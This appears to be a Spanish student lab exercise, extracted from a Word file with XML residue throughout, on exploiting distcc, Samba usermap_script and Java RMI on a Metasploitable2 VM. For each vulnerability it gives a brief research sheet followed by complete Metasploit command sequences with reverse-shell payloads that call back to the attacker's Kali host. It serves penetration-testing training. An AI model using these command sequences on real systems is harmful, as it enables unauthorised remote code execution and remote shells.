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EJERCICIOS METASPLOIT BÁSICO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Prerrequisitos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Kali Linux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Metasploitable2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Ejercicios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Vulnerabilidades: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CVE-2004-2687 (distcc)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CVE-2007-2447 (samba)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CVE-2011-3556 (Java RMI)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Fichas de las vulnerabilidades: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software afecta?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 ese software? (Wikipedia y demás webs)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 la vulnerabilidad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Versiones de software que afectan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Puertos que lo utilizan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Módulos de metasploit relacionados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Explotar las vulnerabilidades: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Buscar en exploitdb el exploit correspondiente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Elegir payload de shell reversa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explotarlo usando Metasploit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4pnfzxt2obx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Ejercicios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iv9a97fp5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CVE-2004-2687 (distcc)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3zhurs01ewy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Investigación de la vulnerabilidad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¿Qué software afecta?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Software afectado:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> distcc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¿Qué es ese software?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distcc es un programa diseñado para distribuir la compilación de código C, C++ y Objective-C entre varios equipos para acelerar el proceso.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Fuente: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Wikipedia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Descripción de la vulnerabilidad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La vulnerabilidad permite la ejecución remota de código debido a la falta de control de acceso adecuado. Esto permite a un atacante ejecutar comandos arbitrarios en el servidor vulnerable.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Fuente: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NVD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Versiones de software que afectan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Versiones afectadas:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> distcc 2.0 a 2.18.3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Puertos que lo utilizan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Puerto:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3632/TCP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Módulos de Metasploit relacionados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Módulo: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unix/misc/distcc_exec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ymd17gkr4he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Explotación de la vulnerabilidad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Buscar en exploitdb el exploit correspondiente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Exploit-DB: distcc_exec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Elegir payload de shell reversa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Payload recomendado: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cmd/unix/reverse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Explotar usando Metasploit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msfconsole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use unix/misc/distcc_exec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set RHOST &lt;IP_DE_METASPLOITABLE2&gt;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set RPORT 3632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set PAYLOAD cmd/unix/reverse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set LHOST &lt;TU_IP_KALI&gt;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set LPORT &lt;PUERTO_LOCAL&gt;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exploit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CVE-2007-2447 (samba)</w:t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tdxvk8nbwoo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Investigación de la vulnerabilidad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software afecta?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Software afectado:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Samba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 ese software?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Samba es una implementación gratuita del protocolo de red SMB/CIFS, que permite compartir archivos e impresoras entre sistemas operativos Windows y Unix/Linux.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Fuente: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Wikipedia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 la vulnerabilidad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Esta vulnerabilidad en Samba permite la ejecución remota de código debido a un problema en el manejo de llamadas RPC.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Fuente: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NVD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Versiones de software que afectan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Versiones afectadas:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Samba 3.0.0 a 3.0.25rc3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Puertos que lo utilizan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Puertos: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">139/TCP, 445/TCP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Módulos de Metasploit relacionados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Módulo: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88038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit/multi/samba/usermap_script</w:t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hvvk1p3t2l0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Explotación de la vulnerabilidad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Buscar en exploitdb el exploit correspondiente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Exploit-DB: Samba CVE-2007-2447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Elegir payload de shell reversa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Payload recomendado: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd/unix/reverse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Explotar usando Metasploit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msfconsole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exploit/multi/samba/usermap_script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 RHOST &lt;IP_DE_METASPLOITABLE2&gt;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 PAYLOAD cmd/unix/reverse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 LHOST &lt;TU_IP_KALI&gt;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 LPORT &lt;PUERTO_LOCAL&gt;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exploit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CVE-2011-3556 (Java RMI)</w:t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i41gkydb2d6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Investigación de la vulnerabilidad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¿Qué software afecta?</w:t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Software afectado:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java RMI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¿Qué es ese software?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Java RMI (Remote Method Invocation) es una API de Java que realiza invocaciones de métodos remotos, permitiendo que los objetos en diferentes JVMs interactúen entre sí.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Fuente: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Wikipedia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Descripción de la vulnerabilidad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Esta vulnerabilidad permite la ejecución remota de código debido a una falla en el deserializador de objetos.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Fuente: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NVD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Versiones de software que afectan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Versiones afectadas:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Todas las versiones de Java RMI antes de la corrección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Puertos que lo utilizan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Puerto:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1099/TCP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Módulos de Metasploit relacionados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Módulo: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exploit/multi/misc/java_rmi_server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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t8zsbid8zip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Explotación de la vulnerabilidad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Buscar en exploitdb el exploit correspondiente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Exploit-DB: Java RMI CVE-2011-3556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Elegir payload de shell reversa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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Payload recomendado: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java/meterpreter/reverse_tcp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Explotar usando Metasploit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msfconsole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use exploit/multi/misc/java_rmi_server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set RHOST &lt;IP_DE_METASPLOITABLE2&gt;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set RPORT 1099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set PAYLOAD java/meterpreter/reverse_tcp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set LHOST &lt;TU_IP_KALI&gt;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set LPORT &lt;PUERTO_LOCAL&gt;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exploit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Explotar las vulnerabilidades:</w:t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3rg0wsrqsedp" w:id="8"/>
      <w:bookmarkEnd w:id="8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1. CVE-2004-2687 (distcc)</w:t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4axlqgu9nie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Explotación de la vulnerabilidad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Iniciar Metasploit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msfconsole</w:t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Seleccionar el módulo distcc_exec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 unix/misc/distcc_exec</w:t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las opciones del módulo</w:t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RHOST &lt;IP_METASPLOITABLE&gt;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RPORT 3632</w:t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PAYLOAD cmd/unix/reverse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LHOST &lt;TU_IP_KALI&gt;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LPORT &lt;PUERTO_LOCAL&gt;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Ejecutar el exploit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exploit</w:t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48300" cy="49053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i2jdgg19o0hb" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit 2: CVE-2007-2447 (Samba)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Iniciar Metasploit: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msfconsole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Configurar el exploit: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 exploit/multi/samba/usermap_script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RHOST 192.168.1.72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PAYLOAD cmd/unix/reverse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LHOST 192.168.1.69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LPORT 4444</w:t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exploit</w:t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731200" cy="3479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731200" cy="426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731200" cy="372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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_54q1seugk36k" w:id="11"/>
      <w:bookmarkEnd w:id="1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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit 3: CVE-2011-3556 (Java RMI)</w:t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Iniciar Metasploit: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  <w:t xml:space="preserve">msfconsole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Configurar el exploit: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 exploit/multi/misc/java_rmi_server</w:t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RHOST 192.168.1.72</w:t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RPORT 1099</w:t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PAYLOAD java/meterpreter/reverse_tcp</w:t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LHOST 192.168.1.69</w:t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 LPORT 4444</w:t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exploit</w:t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pw072riam738" w:id="12"/>
      <w:bookmarkEnd w:id="1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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="3695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fjzkvnjydlk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yz2o9mlg22jb" w:id="14"/>
      <w:bookmarkEnd w:id="1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Notas Importantes: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RHOST: Debes configurar la dirección IP del objetivo (Metasploitable2 en este caso).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LHOST: Debes configurar la dirección IP de tu máquina Kali Linux.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LPORT: Este es el puerto en tu máquina Kali Linux donde Metasploit estará escuchando para la conexión entrante.</w:t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nvd.nist.gov/vuln/detail/CVE-2011-3556" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Java_remote_method_invocation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vd.nist.gov/vuln/detail/CVE-2007-2447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en.wikipedia.org/wiki/Distcc" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2004-2687" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/wiki/Samba_(software)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